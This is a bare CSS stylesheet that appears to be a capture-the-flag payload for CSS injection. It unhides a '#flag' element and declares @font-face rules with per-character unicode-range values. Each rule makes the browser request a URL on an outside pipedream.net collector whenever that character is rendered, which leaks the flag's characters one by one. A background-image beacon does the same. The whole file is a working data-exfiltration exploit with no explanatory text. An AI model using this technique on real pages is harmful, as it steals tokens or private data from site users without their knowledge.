body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W15')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97,p98,p106,p112,p115,p121,p122,p48,p49,p52,p53,p55,p125,monospace;width:15ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a');unicode-range:U+0061}
@font-face{font-family:p98;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b');unicode-range:U+0062}
@font-face{font-family:p106;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j');unicode-range:U+006A}
@font-face{font-family:p112;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p');unicode-range:U+0070}
@font-face{font-family:p115;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s');unicode-range:U+0073}
@font-face{font-family:p121;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y');unicode-range:U+0079}
@font-face{font-family:p122;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z');unicode-range:U+007A}
@font-face{font-family:p48;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0');unicode-range:U+0030}
@font-face{font-family:p49;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1');unicode-range:U+0031}
@font-face{font-family:p52;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4');unicode-range:U+0034}
@font-face{font-family:p53;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5');unicode-range:U+0035}
@font-face{font-family:p55;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7');unicode-range:U+0037}
@font-face{font-family:p125;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D');unicode-range:U+007D}
